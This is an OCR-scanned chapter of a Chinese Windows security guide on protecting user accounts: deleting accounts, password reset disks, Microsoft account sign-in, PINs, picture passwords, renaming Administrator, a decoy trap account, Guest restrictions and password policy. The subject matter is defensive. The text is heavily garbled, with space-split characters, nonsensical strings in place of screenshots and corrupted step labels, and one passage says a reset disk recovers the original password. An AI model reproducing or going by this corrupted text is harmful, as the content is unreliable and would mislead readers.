户 名 称 的 设置 。 
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step 图 进入 “删除 账户 ”窗口 ， 提 示 用 户 是 
否 保存 账户 的 文件 。 


号 更 ax 起 记 
. - 个 中 < 管 型 、， 更 改 帐户 


更 改 demo 的 帐户 

更 改 帐 户 名 称 

更 改 密码 demo 
更 改 帐 户 关 型 本 地 帐户 
li 过 而 保护 
管理 其 他 本 户 


7.3.5 删除 用 户 账户 
对 于 不 需要 的 本 地 账户 ， 用 户 可 以 将 
其 删除 ， 有 具体 的 操作 步骤 如 下 。 


Ew 加 打开 “管理 账户 ”窗口 ， 在 其 中 选择 
要 删除 的 账户 。 


中 管理 帐户 - Oo x 
tf 人》 vv 个 网 «用户.. 管理 帐户 v 已 涩 襟 这 制 。 记 p 
~ 
选择 要 更 改 的 用 户 
本 Administrator 
2 Ba 
Administrator 


admini 
BR 


v 


EG 国 进入 “更 改 账户 ”窗口 ， 在 其 中 单 击 
左 侧 的 “删除 账户 ”起 链接 。 


中 更 改 帐户 过 x 
< - 个 上 < 管理 ， 更 改 生产 ~ 局 | 当主 过 S 林 后 | 
更 改 demo 的 帐户 
更 改 帐 户 名 称 
更 改 译 三 demo 
更 改 帐 户 关 型 A 
二 


sd | 


下 有 tk 户 - OO x 
一 ”个 中 <“ 车 理 ，， 开 到 帐 户 Y 叫 。。 惠 索 控 制 面板 

是 否 保留 demo 的 文件 ? 

开除 demo 的 帐户 前 . Windows 会 生动 村 demo 的 点 面 和 文档 收藏 灾 、 音 乐 、 图 片 和 


视频 文件 实 约 内 容 保存 到 庶 面 上 一 个 名 为 “demo" 的 新 文件 夹 。 但 是 ，Windows 无 法 保存 
demo 的 电子 部 件 和 其 他 设置. 


De] [ 本 克 ] [而 


[step 国 单 去 “删除 文件 ”按钮 ， 进 入 “ 确 
认 删 除 ” 窗 口 ， 提 示 用 户 是 否 确实 要 删除 
demo 账 户 。 


中 Re - OO x 

€ ~ 个 中 “各 从 .，， 确认 测 除 Y 局。 搜索 控制 面 屋 

确实 要 齐 除 demo 的 帐户 吗 ? 

Windows 将 到 险 demo 的 所 有 文件 然后 入 除 demo 的 帐户. 
[EC 


step 图 单 击 “删除 账户 ”按钮 ， 即 可 删除 选 
择 的 账户 ， 并 返回 到 “管理 账户 ”窗口 ， 

在 其 中 可 以 看 到 要 删除 的 账户 已 经 不 存 
在 了 。 


中 管理 帐户 = “本 并 
¢ ~ 个 号 “ 用 广 .，， 管 理 帐户 Y 局。 搜 索 深 制 面板 
选择 要 更 改 的 用 户 


是 Administrator 


Administrator 


侈 提示 :对 于 当前 正在 登录 的 账户 ，Win- 
dows 是 无 法 删除 的 ， 因 此 ， 在 删除 账户 
的 过 程 中 ， 会 弹出 一 个 “用 户 账 户 控制 面 
板 ” 信 息 提示 框 来 提示 用 户 。 


用 户 帐户 控制 面板 x 


Windows 无 法 删除 当前 登录 的 帐户 。 
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泗 7.3.6 创建 密码 恢复 盘 


有 时 ， 进 入 系统 的 账户 密码 被 黑客 破 
解 并 修改 后 ， 用 户 就 无 法 进入 系统 ， 但 如 
果 事 先 创建 了 密码 恢复 盘 ， 就 可 以 强制 进 
行 密码 恢复 以 找到 原来 的 密码 。Windows 系 
统 自 带 创建 账户 密码 恢复 盘 功 能 ， 利 用 该 
功能 可 以 创建 密码 恢复 盘 。 

创建 密码 恢复 盘 的 具体 操作 步骤 如 下 。 
[step 国 选择 “开始 ”一 “控制 面板 ”命令 ， 
打开 “控制 面板 ”窗口 ， 双 击 “ 用 户 账 
户 ” 图 标 。 


攻 


全 ， 个 加， ， 所 有 了 机 1 而 
rt MAD) EV) IRM 可 Bl 


调整 计算 加 99 设 秆 Te 


RTX 
~ 旬 公 辐 xiEF 园 “ess 

@ Hepes 个 上 马 ssism 
呢 昌 zafoH 间 者 ER 舍 认 和 和 H 印 机 
时 天 2 8 | 

@ mt 起 msiostyh 取 文 #5 史记 
BB Xi a Ft 图 sa 示 

人 ese 国 wm 图 51o ment 
起 roP 中 党 ss= 日 ssiRa 
[PS 办 了 作 


step 图 打开 “用 户 账户 ”窗口 ， 在 其 中 选择 
要 创建 密码 恢复 盘 的 账户 ， 单 击 “ 创 建 密 
码 重 置 盘 ”起 链接 。 


文中) 病名 日 坦 在 工具) 硕 动 1H) 
控制 面 居 主页 


更 改 帐户 信息 
Nemes 下 雹 局 论 轩 中 时 折光 
Et 此 户 二 和 Administrator 
ee 2 说 
Adminiewator 
轩 本 高级 用 广 配 吾 文 外 屋 仁 RP 
ea ® eee 


© ER 


step 图 此 时 ， 可 看 到 弹出 的 “欢迎 使 用 忘记 
密码 向 导 ” 对 话 框 。 
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欢迎 合用 忘记 密码 向 导 


内 二 届 则 Rgl 巡 一 个 .本 机 和 要 "到 尾 ， 刘 果 fFE 记 了 用 疡 了 
,下 


全 二 fF 少 光 ， 作 RR 寺 委 于 此 息 一 次。 


和 人 人才 5] 同和 村 ,并 雍 访 林 广 。 


二 要 泵 U 条 上 让 入 记 双 六 二 革 皇 .二 恬 入 U 盘 ， 撕 后 半 直下 
— 


站 下 下 要 


本 


下 -> BR 


[sp 图 单 去 “下 一 步 ” 按 钮 ， 弹 出 “创建 密 
码 重 置 盘 ”对 话 框 。 


二 向 芝 


和 
同和 所 区 同 记 也 天 拉 区 友信 四 保存 到 下 看 的 沽 动 铺 中 的 这 得 上 ， 


个 二 太吉 二 MW}: 


< 上 -Bl [Tm >] ms 
[Eee 图 单 去 “下 一 步 ”按钮 ， 弹 出 “当前 用 
户 账户 密码 ”对 话 框 ， 在 下 面 的 文本 框 中 
输入 当前 用 户 密 码 。 


EE 


此 向 要 天 和 ~ 站 人 和 在 夺 


[E87] 吉 


[step 国 单 去 “下 一 步 ” 按 钮 ， 开 始 创建 密码 
重 置 盘 。 创 建 完 毕 后， 将 它 保存 到 安全 的 
地 方 ， 这 样 就 可 以 在 密码 丢失 后 进行 账户 
密码 恢复 了 。 


7.4 ”Microsoft 账户 的 防护 策略 


Microsoft 账 户 是 用 于 登录 Windows 操 作 
系统 的 电子 邮件 地 址 和 密码 ， 本 节 介 绍 Micro- 
soft 账 户 的 设置 与 应 用 ， 从 而 保护 电脑 系统 。 


7.4.1 注册 并 登录 Microsoft 账 户 


要 想 使 用 Microsoft 账 户 管理 此 设备 ， 
首先 需要 做 的 就 是 在 此 设备 上 注册 并 登录 
Microsoft 账 户 。 注 册 并 登录 Microsoft 账 户 
的 具体 操作 步骤 如 下 。 

单 击 “ 开 始 ” 按 钮 ， 在 弹出 的 “开始 
屏幕 ”中 单 击 登录 用 户 ， 在 弹出 的 下 拉 列 
表 中 选择 “更 改 账户 设置 ”选项 。 


[step 贺 打开 “设置 -账户 ”窗口 ， 在 其 中 选 
择 “ 你 的 电子 邮件 和 账户 ”选项 。 


工作 单位 访问 
训话 和 他 用 户 


局 6 他 的 二 


[Beep 图 单 去 “电子 邮件 、 日 历 和 联系 人 ”下 
方 的 “添加 账户 ”选项 。 


第 7 章 ”电脑 系统 账户 的 防护 策略 ES 


| i 


ER [Es 
E 
ssa 
工作 和 他 访 问 创建 你 的 头像 
aa @ ar 
esas 
电子 邮件 、 日 历 和 联系 人 
i 
其 他 应 用 使 用 的 帐户 


证 加工 作答 位 时 字 析 由 户 


[sep 图 弹出 “选择 账户 ”对 话 框 ， 在 其 中 选 
择 “Outlook.com” 选 项 。 


选择 帐户 
ls oe 
Ovookcom. lve 
晤 : 
chenge. Offce 365 
加 ccooe 


om_HoamaiL MSN 让 


回 ao 

其 他 帐户 
a PoP. MAp 
be 二 ResE 订 


关闭 


打开 “添加 你 的 Microsoft 账 户 ” 对 话 
框 ， 在 其 中 可 以 分 别 输入 Microsoft 账 户 的 
电子 邮箱 地 址 、 手 机 号 及 密码 。 如 果 没有 
Microsoft 账 户 ， 则 需要 单 击 “ 创 建 一 个 ! ” 
超 链 接 。 


添加 你 的 Microsoft 帐户 


全 用人 9 Microsoft 林产 妆 录 ,以 生态 问 你 所 有 设 各 上 的 文档 、 设 知 和 购买 ， 了 租 
更 名 


Microsoft 入 私 声明 


[step 图 打开 “让 我 们 来 创建 你 的 账户 ”对 话 
框 ， 在 其 中 输入 账户 信息 。 
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让 我 们 来 创建 你 的 帐户 


Windows, Office, Outlook.com, OneDrive, Skype 
Microsoft 由 户 人 1 
信忠 


Xbox, 当 你 用 
这 芝 产 品 和 为 人 是 代 更 瑟 才 更 只 个 性 tt 本 短 。 ”了 新 主 


-吉林 作 已 经 合用 了 其 个 Microsoft 服务 ， 风 应 把 本 以 便 用 让 相关 要 示 - 


单 击 “ 下 一 步 ”按钮 ， 打 开 “ 添 加 安 
全 信息 ”对 话 框 ， 在 其 中 输入 手机 号 码 。 


x 


添加 安全 信息 


9 安全 信息 有 且 于 保护 人 账户 我 们 符合 阳 比 信息 平 帮助 你 隐身 到 码 ， 庆 助人 
I 六 弟 党 尖 训 经 项 ， 放 在 休 昌 有 trS9 让 你 你 下 正 沉 枢 证， 和 人 不 雪 和 后 它 
来 尖 这 可 二 件 ， 


为 ID0 弓 这 曙 了 部件 


step 国 单 直 “下 一 步 ”按钮 ， 打 开 “ 查 看 与 
你 相关 度 最 高 的 内 容 ” 对 话 框 ， 在 其 中 查 
看 相关 说 明 信 息 。 


查看 与 你 相关 度 最 高 的 内 容 

当 Microsoft 二 和 用 你 的 首先 JI 有 分 析 Fte 提 池 寻 fk 兴 进行 个 性 化 

时 ,全 克 保 你 能 宇 到 位 生 训 次 的 捞 未 华军 广告 ,以 及 只 人 内容 你 可 以 在 线 更 改 

这 二 ,岂可 以 在 下 和 Microsoht 产品 和 服务 中 并行， 

图 ttf Microsoft Advertsing 全 Fla9 让 信息 ， 全 开 89 在 人 过 这 (你 
可 更 鸡 此 吉村，) 

国 二 Microsoft 促 和 于 他 ( 人 可 Dn 网。) 


单机 下 一 步 表 示 他 辣 意 Microsoft 服 号 的 这 和 了 社 和 cookie 声明 - 


家 step 图 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 是 否 使 
用 Microsoft 账 户 登 录 此 设备 ? ”对 话 框 ， 
在 其 中 输入 你 的 Windows 密 码 。 
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为 穆 是 你 本 人 ,我 科 二 要 作品 后 一 次 提供 当 闻 Windows 认 码 下 次 登录 
Windows 时 ， 格 便 用 人 的 Microsoft 帐 疡 要 玛 。 


如果 PS 有 有 Windows 灾 三 ,请 移 用 保 硬 为 宇 ， 并 坎 提 下 一 步 "。 


ST Windows EB 


本 录 此 由 用 


[Sep 图 单 去 “下 一 步 ”按钮 ， 打 开 “ 全 部 完 
成 ”对 话 框 ， 提 示 用 户 “ 你 的 账户 已 成 功 


设置 ”。 


全 部 完成 ! 
他 帐户 已 成 功 设置 


旧 5 -rom ou ook co 


碗 成 


单 击 “完成 ”按钮 ， 即 可 使 用 Microsoft 
账户 登录 到 本 台 计 算 机 上 。 至 此 ， 就 完成 了 
Microsoft 账 户 的 注册 与 登录 操作 。 


四 一 
各 
[ri no 
i ha 4 
Po 人 信息 、 窜 话 汉 二、 林 司 ， 几 全 座 夫 
2 Microsofht 由 
让 记 
避 岂 村 地 际 让 名录 
8 
你 的 头像 
人 到 oO \ 
™ 
- 


7.4.2 ”设置 账户 登录 密码 


为 账户 设置 登录 密码 ， 可 以 在 一 定 程 


度 上 保护 电脑 的 安全 。 为 Microsoft 账 户 设 
置 登录 密码 的 具体 操作 步骤 如 下 。 


step 国 以 Microsoft 账 户 类 型 登录 本 台 设 备 ， 
然后 选择 “设置 -账户 ”窗口 中 的 “登录 选 
项 ”选项 ， 进 入 “登录 选项 ”设置 界面 。 


三 
wr 
eT i 
需要 登录 
be 因果 要 开 了 由 入 , 则 Windows 户 且 要 下 人生 要 到 
mt hn Sa er 
oR 
密码 
fs 
rm 
PIN 
可 站 和 的 PIN， 忆 你 避 Windumes 及 二 用 加 
有 天内 可 天 PN 
ja 


step 图 单 击 “密码 ”区 域 下 方 的 “更 改 ” 按 
钮 ， 打开“ 更 改 你 的 Microsoft 账 户 密码 ” 
对 话 框 ， 在 其 中 输入 当前 密码 和 新 密码 。 


更 改 你 的 Microsoft 帐户 密码 


step 图 单 击 “下 一 步 ” 按 钮 ， 即 可 完成 
Microsoft 账 户 登 录 密 码 的 更 改 操作 ， 最 后 
单 击 “ 完 成 ”按钮 。 


你 已 成 功 更 改 密码 ! 


黄鱼 计算 机 ,然后 用 位 的 新 宗 码 二 新 益 录 。 《我们 发 现 立 即 严 用 安 码 有 昌 于 你 
后 记 人 本 码 ，) 
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7.4.3 设置 PIN 密码 


PIN 密码 是 可 以 替代 登录 密码 的 一 组 数 台 
据 ， 当 用 户 登 录 到 Windows 及 其 应 用 和 服 
务 时 ， 系 统 会 要 求 用 户 输入 PIN 密码 。 设 置 
PIN 密码 的 具体 操作 步骤 如 下 。 
[step 图 在 “设置 -账户 ”窗口 中 选择 “登录 
选项 ”选项 ， 在 右 侧 可 以 看 到 用 于 设置 PIN 
密码 的 区 域 。 


可 本 
登 凡 [Erm 
eT 
PIN 
E 
ro PN fa Window 有 Ri 
| Treena IN 
HB 
me 
| 图 片 密码 
Ee Wndows 
mo 
相关 的 设置 


[Be 国 单 去 PIN 区 域 下 方 的 “添加 ”按钮 ， 
打开 “请 重新 输入 密码 ”对 话 框 ， 在 其 中 
输入 账户 的 登录 密码 。 


请 重新 输入 密码 
SF Microroft PETE 


zhan om ook. Com 


step 图 单 击 “登录 ”按钮 ， 打开“ 设置 
PIN” 对 话 框 ， 在 其 中 输入 PIN 密码 。 


seep 网 单 去 “确定 ”按钮 ， 即 可 完成 PIN 密 
码 的 添加 操作 ， 并 返回 到 “登录 选项 ” 设 
置 界面 中 。 
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ssp 图 单 击 “确定 ”按钮 ， 打 开 “ 设 置 


如 果 想 要 更 改 PIN 密码 ， 则 可 以 单 击 
PIN 区 域 下 方 的 “ 和 更改” 按钮， 打开“ 更 改 
PIN” 对 话 框 ， 在 其 中 输入 更 改 后 的 PIN 密 
码 ， 然 后 单 击 “ 确 定 ”按钮 即 可 。 


更 改 PIN 


| 


step 园 如 果 忘记 了 PIN 密码 ， 则 可 以 在 “ 登 
录 选 项 ”设置 界面 中 单 击 PIN 区 域 下 方 的 
“我 忘记 了 我 的 PIN” 超 链接 。 


车 上 


人 的 电子 部 从 和 帐户 
Bs] PIN 
IfFRQA 


其 他 用 户 


同步 你 9 设置 


step 国 打开 “首先 ， 请 验证 你 的 账户 密码 ” 
对 话 框 ， 在 其 中 输入 登录 账户 密码 。 


首先 ， 请 验证 你 的 帐户 密码 。 
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PIN” 对 话 框 ， 在 其 中 重新 输入 PIN 密码 ， 
单 击 “确定 ”按钮 即 可 。 


[Sep 图 如 果 想 要 删除 PIN 密码 ， 则 可 以 在 
“登录 选项 ”设置 界面 中 单 击 PIN 设置 区 域 
下 方 的 “删除 ”按钮 。 


PIN 
从 可 以 便 用 此 PIN 兽 录 到 Windows 及 并 应用 和 和 服务、 


mm 


SCT PIN 


图 片 密码 
使 用 幸 革 的 更 上 全 到 Windows 


相关 的 设置 


step 辆 在 PIN 密码 区 域 显 示 出 确实 要 删除 


PIN 密码 的 信息 提示 。 
和 i 
全 wp EE 
HATE 
PIN 
a 
PIN 则 ? 
a 全 PIN 可 以 方便 人 到 Windows、 人 于 
人 ws 志 认 让 、 插 和 全 最 
尖 人 下 重用 Windows Hallo 时 ， 如果 风险 了 fj 的 PIN ， 
Tf 


加 时 你 和 遇 不 合用 PIN 陪 六 岗 Windows， 清 在 上 面 的 需 
要 辣妹 "下 产 吉 并 从 下 拉 亲 单 中 尝 " 从 且 加 中 号 可 电脑 
时 


了 角 如 同人 用 PIN 六 确保 安全 


step 园 单 击 “删除 ”按钮 打开“ 首先 ， 请 
验证 你 的 账户 密码 ”对 话 框 ， 在 其 中 输入 
登录 密码 。 


二 验证 你 的 帐户 密码 。 


[step 图 单 去 “确定 ”按钮 ， 即 可 删除 PIN 窗 
码 ， 并 返回 到 “登录 选项 ”设置 界面 中 ， 
可 以 看 到 PIN 设置 区 域 只 剩 下 “添加 ” 按 
钮 ， 说 明 删 除 成 功 。 


+ 码 a 
从 mr EE 
tea Teton 
PIN 
们 而 
可 和 fC PIN， 当 人 查寻 各 Windows 及 只 有 
feetgw 癌 和 用 学时 ， 取 统 全 要 否 欠 入 比 PIN， 
Mn 
SP 
Mote 图 片 密码 
全 站 要 敌 的 晴 上 部 录 到 Window 
TB 
相关 的 设置 


7.4.4 使 用 图 片 密码 


图 片 密码 是 一 种 帮助 用 户 保护 触 屏 电 
脑 的 全 新 方法 ， 要 想 使 用 图 片 密码 ， 用 户 
需要 选择 图 片 并 在 图 片上 画 出 各 种 手势 ， 
以 此 来 创建 独一无二 的 图 片 密码 。 

创建 图 片 密码 的 具体 操作 步骤 如 下 。 
在 “登录 选项 ”工作 界面 中 单 击 “ 图 
片 密码 ”下 方 的 “添加 ”按钮 。 


C7 ER 
个 迪 吾 培 设 半 
们 的 直子 邮件 和 帐户 
王 录 过 顺 PIN 
网 人 可 各 代 各 的 PiN。 二 人 各 录 汉 Windows 有 二 

和 用 和 服气 时 ， 五 统 全 水 的 入 此 PIN。 
于 人 用户 本 1 
同上 fo 得 

图 片 密码 

人 Window 

EE 
相关 的 设置 


有 


[Bp 国 打开 “创建 图 片 密码 ”对 话 框 ， 在 其 
中 输入 账户 登录 密码 。 


第 7 章 ”电脑 系统 账户 的 防护 策略 


[step 图 单 去 “确定 ”按钮 ， 进 入 “图 片 密 


码 ” 窗 口 。 


step 图 单 南 “选择 图 片 ” 按 钮 ， 弹出“ 打 
开 ” 对 话 框 ， 在 其 中 选择 用 于 创建 图 片 密 
码 的 图 片 。 


Cjpsripearbmpr ~ 
Cro) mw 


单 击 “ 打 开 ” 按钮， 返回 到 “图 片 密 
码 ”窗口 ， 在 其 中 可 以 看 到 添加 的 图 片 。 


step 较 单 去 “使 用 此 图 片 ” 按 钮 ， 进 入 “ 设 
置 你 的 手势 ”窗口 ， 在 其 中 通过 拖 慢 鼠标 
绘制 手势 。 
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[step 国 手势 绘制 完毕 后 ， 进 入 “确认 你 的 
手势 ”窗口 ， 二 步 绘 制 的 
手势 。 


{ 壤 


[GE 手势 衣 认 完毕 后 ， 进入 “恭喜 ! ” 窗 
口 ， 提 示 用 户 图 片 密码 创建 完成 。 


单 击 “ 完 成 ”按钮 ， 返 回 到 “登录 选 


项 ”工作 界面 ， “添加 ”按钮 已 经 不 存在 ， 
说 明 图 片 密码 添加 完成 。 

¢ a ER 
区 及 EE 

你 的 电子 郝 件 和 帐户 下 

登录 选 而 PIN 

其 他 用 户 证 加 


局 此 你 的 设 客 
图 片 密码 
使 用 关 的 十 上 登录 到 Windows 
Ex E33 


相关 的 设置 


馈 村 8 盏 
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侈 提示 :如 果 想 要 更 改 图 片 密码 ， 可 以 
通过 单 击 “ 更 改 ” 按 钮 来 操作 ; 如 果 想 
要 删除 图 片 密码 ， 则 可 以 单 击 “ 删 除 ” 
按钮。 


7.5 别 样 的 系统 账户 数据 防护 
策略 


为 了 自己 的 电脑 系统 账户 密码 不 被 盗 
取 ， 用 户 还 需要 在 平时 加 强 对 电脑 账户 密 
码 的 管理 。 


7.5.1 更 改 系统 管理 员 账 户 名 称 


在 系统 中 Administrator 账 户 是 默认 的 
系统 管理 员 账 户 ， 而 且 无 法 轻易 删除 。 黑 
客 可 以 使 用 扫描 工具 和 攻击 工具 ， 对 Ad- 
ministrator 账 户 密码 进行 猜 解 ， 因 此 ， 对 
Administrator 账 户 加 强 保护 是 非常 必要 的 。 
对 Administrator 账 户 保护 最 直接 的 方法 是 删 
除 ， 其 次 是 更 改名 称 ， 使 黑客 的 扫描 工具 
不 能 寻找 到 Administrator 账 户 名 称 ， 避 免 对 
其 密码 的 破解 。 

更 改 Administrator 账 户 名 称 的 具体 方法 
如 下 。 

在 “控制 面板 ”窗口 中 双击 “管理 工 
具 ” 图 标 ， 进 入 “管理 工具 ”窗口 


本 < 证 


[Bp 图 在 “管理 工具 ”窗口 中 双击 “计算 机 
管理 ”图 标 ， 打 开 “ 计 算 机 管理 ”窗口 。 


第 7 章 ”电脑 系统 账户 的 防护 策略 ES 


EE 7 = 
HN I HEV) ml 
如 中国 忆 | 日 二 


E33 bn 口 x 
文 忻 月 ” 剖 作 (A| 去 寺 IV) 大 启 (中 
犁 中 各国 | 光 目 包 | 日 国 


在 左 侧 窗口 中 展开 “系统 工具 ”一 
“本 地 用 户 和 组 ”选项 ， 选 取 “ 用 户 ” 项 。 
蔚 计 其, 入 理 

En 
二 计 其 多 村 (+ 名 称 全 名 


o x 


在 右 侧 窗口 中 选中 “Administrator” 
账户 名 称 并 右 击 ， 弹 出 的 快捷 菜单 中 包括 
“设置 密码 ” “删除 ?” “ 重 命 名 ? “ 属 
性 ” “帮助 ” 等 。 


ER - Oo x 
文 从 胡 。 措 作 (A) 二 看 V) 大 2DH) 
各 中 | 自 园 | 光 目 已 | 日 贺 


二 计 员 和 池 + 均 | Ea 图 
~ 让 IT 
© 加 eatt 主机 
本 志 cem 0 
~ 4sRina 加 Gee pe) 
EE 
国 类 性 四 
回避 
re WH) 
~ 如 友信 
后 达 让 管理 
记 服务 和 应 月 且 序 
| 至 寺 名 当前 所 选 内 容 . 


[step 图 在 快捷 菜单 中 执行 “ 重 命名 ”命令 ， 
则 Administrator 账 户 名 称 处 于 可 修改 状态 ， 
删除 原来 的 名 称 并 输入 新 的 名 称 ， 如 下 图 
所 示 为 修改 后 的 系统 管理 员 账 户 名 称 。 


侈 提示 :修改 后 的 名 称 不 要 使 用 Admin、 
root 等 系统 常用 的 名 称 ， 否 则 与 不 修改 没有 
两 样 。 


7.5.2 通过 伪造 陷阱 账户 保护 管理 员 
账户 


除了 更 改 系统 管理 员 账户 的 名 称 这 个 
方法 外 ， 用 户 还 可 以 在 此 操作 的 基础 上 ， 
再 重新 创建 一 个 名 称 为 “Administraotr” 的 
账户 ， 但 不 赋予 该 账户 任何 权限 ， 并 且 设 
置 一 个 高 度 复杂 的 密码 ， 然 后 对 该 账户 启 
用 审核 功能 。 

设置 账户 陷阱 的 具体 操作 步骤 如 下 。 
[step 图 打开 “计算 机 管理 ”窗口 ， 依 次 展开 
“系统 工具 ”一 “本 地 用 户 和 组 ”一 “用 
户 ” 选 项 ， 在 右 侧 窗口 的 空白 处 右 击 ， 从 弹 
出 的 快捷 菜单 中 选择 “新 用 户 ” 菜 单项 。 


本 


ET mx 
ZH i ESV) WH) 
各 中 | 者 辆 区 臣 | 目 局 
EE [se 3 桨 作 
和 123 | 
He 加 Defavbhecount ES 
国 汉中 es. 
司 = 六 二 本 
加 二 1 用户 PE 时 
Em | 
全 组 MN) 
加 46 
a ET 
Ere EM 
es 
aad 
本 5 和 用 本 序 et 
HD) 
Se 


[Sep 图 打开 “新 用 户 ” 对 话 框 ， 在 “用 户 
名 ”文本 框 和 “全 名 ”文本 框 中 分 别 输入 
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Administrator， 然 后 在 “密码 ”文本 框 和 [step 图 单 击 “ 添 加 ”按钮 ， 打 开 “ 选 择 组 ” 
“确认 密码 ”文本 框 中 设置 高 度 复杂 的 密 ”对 话 框 。 
码 ， 并 色 选 “用 户 不 能 更 改 密码 ” 复 选 框 。 Be 


新 用 户 1? Xx sissy 

主 RO). 

Aaministrator 

rlUy i 
Se [aminictrator DESKTOPJMOMOB Er 
Oj: BE 近 入 条 全 科 法 芝 于 汐 辐 : 

| Sess 
PY 
三 机 友 (C 

ERA- RE [a 


ES [sep 四 单 击 « 高 级 ” 按钮 ， 即 可 发 现 该 对 话 
Dregmg 框 的 功能 被 扩展 ， 再 单 击 “ 立 即 查找 ” 按 
钮 ， 即 可 将 当前 系统 中 所 有 的 组 列 出 来 。 


AH) ee en 二 
0 al 
x > 忆 - 
[step 图 单 去 “创建 ”按钮 ， 即 可 在 系统 用 户 : | 
列表 中 发 现 多 出 一 个 Administrator 账 户 。 Ee | 
-ea 
=- oo x 四 四 me 
4 要 0 于 动 HH 
中 中 | 由 尖 回 孔 | 日 出 Ba 
ET EE 人 [3 
“War 车 12 Te 
minetrator oo Adminctrator ££ | 
本 要 是 befaueceonr Ss 冰 
WORAN 靳 dom 
的 本 Guest 更 3- 
3 7 
i 
Te 
MP 


[se 加 右 击 该 账户 ， 在 弹出 的 快捷 菜单 中 选 = 

择 “ 属 性 ”菜单 项 ， 打 开 “Administrator 属 。 [sep 贺 选取 Guests 用 户 组 ， 单 击 “确定 ” 按 

性 ”对 话 框 。 钮 ， 即 可 将 其 添加 到 “输入 对 象 名 称 来 选 
i x 择 ” 文 本 框 中 。 


珊 丙 如 司 于 邓 轨 从 


ia 让 
RM) 
| 
SO 
EF 
DESKTOPJMOMOB EL. 
入 入 全 各 寺 GD: 
[DESKIOP JMOAAOSI Guests| EO) 
ERA He 本 


= step 图 单 击 “ 确 定 ” 按 钮 ， 即 可 将 Guests 用 
|e 户 组 添加 到 Administrator 的 “隶属 于 ”列表 
| | Bi 框 中 。 
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rear EE x 
ae RE 
al 
been 
Fm RR 
EZ RW 
EE mm SAN be 


在 “隶属 于 ”列表 框 中 ， 选 择 Users 
用 户 组 ， 单 击 “ 删 除 ” 按 钮 将 其 删除 ， 即 


可 完成 系统 账户 陷阱 的 设置 。 
em 
| 


不 过 这 样 还 不 够 完美 ， 稍 有 经 验 的 黑 
客 都 会 从 本 地 或 Terminal Service 的 登录 界面 
中 查看 到 登录 过 的 用 户 名 ， 识 破 我 们 的 陷 
阱 ， 因 此 还 需要 禁止 显示 登录 的 用 户 名 。 
[step 图 打开 “控制 面板 ”窗口 ， 双 击 “ 管 理 
工具 ”一 “本 地 安全 策略 ”图 标 。 


上 | 日 目 医生 一 五 so 
= :sx := = 二 © 
人 
震 人 2 速 沪 可 
cs seem 
Oreorie ep 
衣 1 司 wrdo pas 
pr me 、 
es a 
ep 
Bs -人 
Di ew Windcws 区 过 
山下 乐 震 寺 SW 
国 55 D te ar 
各 Windowstot 黑 43s3 
ED 入 未 上 等 理 和 优化 也 动 吕 
a 
soe 
sse es 
Hea Dit 
EE 


第 7 章 ”电脑 系统 账户 的 防护 策略 Ss 


en 打开 “本 地 安全 策略 ” 窗 
开 “ 本 地 策略 ”一 


口 ， 依 次 展 
安全 选项 ”选项 ， 在 右 


侧 窗 口中 找到 “交互 式 登录 : 不 显示 最 后 的 
用 户 名 ”选项 ， 并 单 击 右键 ， 在 弹出 的 快捷 
菜单 中 选择 “属性 ”菜单 项 。 


EP 


[step 图 打开 “交互 式 登录 ; 不 显示 最 后 的 
用 户 名 属性 ”对 话 框 ， 选 中 “已 启用 ” 单 
选 按钮 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 完成 操 
作 ， 使 系统 不 再 显示 登录 的 用 户 名 称 。 


不 ? x 


es 人 GE 罗网 


Ts 


@Eene 


CEJ ws 


7.5.3 ”限制 Guest 账 户 的 操作 权限 


停 用 Guest 账 户 也 不 太 现 实 ， 尤 其 在 局 台 
域 网 共享 中 ，Guest 账 户 用 起 来 还 是 比较 方 
下 可 是 Guest 账 户 存 在 着 很 大 的 安全 隐 
患 ， 只 要 用 户 对 Guest 账 户 设 定 相 关 的 操作 
权限 ， 限 制 其 操作 的 范围 ， 这 样 既 可 以 防 
止 黑 客 的 利用 又 可 以 享受 Guest 账 户 的 便 
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利 。 设 置 Guest 账 户 操 作 权 限 的 具体 操作 
步骤 如 下 。 

[see 国 在 “运行 ”对 话 框 中 输入 gpedit.msc 
命令 ， 单 击 “ 确 定 ” 按 钮 。 


可 运行 x 


windows 将 由 fr 扩 入 的 名 称 ,为 你 林 开 有 直 风 得 冯 
文件 闪 . 文档 碟 nternet 交 源 


FF(O): |gpeditmsd 


I 9- 


step 图 打开 “组 策略 ”窗口 ， 依 次 展开 “ 计 
算 机 配置 ”一 “Windows 设 置 ”一 “安全 设 
置 ” 一 “本 地 策略 ”一 “安全 选项 ”选项 。 


中 中 由 加 X 坟 | 目 己 
EDIT 


大 
同和 4 天 
SR Sx 
ep eet me 
EE ET 


由 在 右 侧 的 窗口 中 双击 “网 络 访问 : 不 
ep eb 
打开 “网 络 访问 : 不 允许 SAM 账 户 和 共 
享 的 匿名 枚 举 属性 ”对 话 框 ， 选 中 “已 启 
用 ” 单 选 按钮 。 


si Wg 


Fe 


EE 
O Bm 


ti 
ER OR Tre SA SE 


Ce | nw 
[Eee 加 单 去 “确定 ”按钮 ， 完 成 设置 。 
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7.6 通过 组 策略 提升 系统 账户 
密码 的 安全 


用 户 在 “组 策略 编辑 器 ”窗口 中 进行 相 
关 功 能 的 设置 ， 可 以 提升 系统 账户 密码 的 安 
全 系数 ， 如 密码 策略 、 账 户 锁定 策略 等 。 


7.6.1 设置 账户 密码 的 复杂 性 


在 “组 策略 编辑 器 ”窗口 中 通过 密码 
策略 可 以 对 密码 的 复杂 性 进行 设置 ， 当 用 
户 设置 的 密码 不 符合 密码 策略 时 ， 就 会 弹 
出 提示 信息 。 

设置 密码 策略 的 具体 操作 步骤 如 下 。 
[Se 加 在 “本 地 组 策略 编辑 器 ”窗口 中 展开 
“计算 机 配置 ”一 “Windows 设 置 ”一 “ 安 
全 设置 ”一 “账户 策略 ”一 “密码 策略 ” 
项 ， 进 入 “密码 策略 设置 ”界面 。 


双击 “密码 必须 符合 复杂 性 要 求 ” 
选项 ， 打 开 “ 密 码 必 须 符合 复杂 性 要 求 属 
性 ”对 话 框 ， 选 中 “已 启用 ” 单 选 按钮， 
即 可 启用 密码 复杂 性 要 求 。 


HaE a 


时 


® ce 
Das 


step 回 双击 “密码 长 度 最 小 值 ” 选项 ， 即 可 
打开 “密码 长 度 最 小 值 属性 ”对 话 框 ， 根 
据 实际 情况 输入 密码 的 最 少 字符 个 数 。 


更 可 长 民 屋 小 让 尾 作 YX 


ba] ARA) 


斧 提 示 : 由 于 空 密码 和 太 短 的 密码 都 很 容 
